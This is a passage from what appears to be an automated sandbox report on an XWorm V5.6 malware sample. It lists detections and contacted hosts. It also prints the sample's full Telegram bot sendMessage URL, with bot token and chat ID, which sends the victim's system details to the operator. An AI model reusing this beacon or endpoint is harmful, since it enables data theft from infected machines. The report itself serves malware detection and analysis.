file 13->51 53 Multi AV Scanner detection for dropped file 13->53 55 Machine Learning detection for dropped file 13->55 file6 signatures7 process8 process9 21 conhost.exe 19->21         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.198.168.179
 unknown United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
ip-api.com 208.95.112.1 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer false
    		high
    127.0.0.1 false
      		high
      http://ip-api.com/line/?fields=hosting false
        		high
        104.198.168.179 true
        • Avira URL Cloud: safe
        		 unknown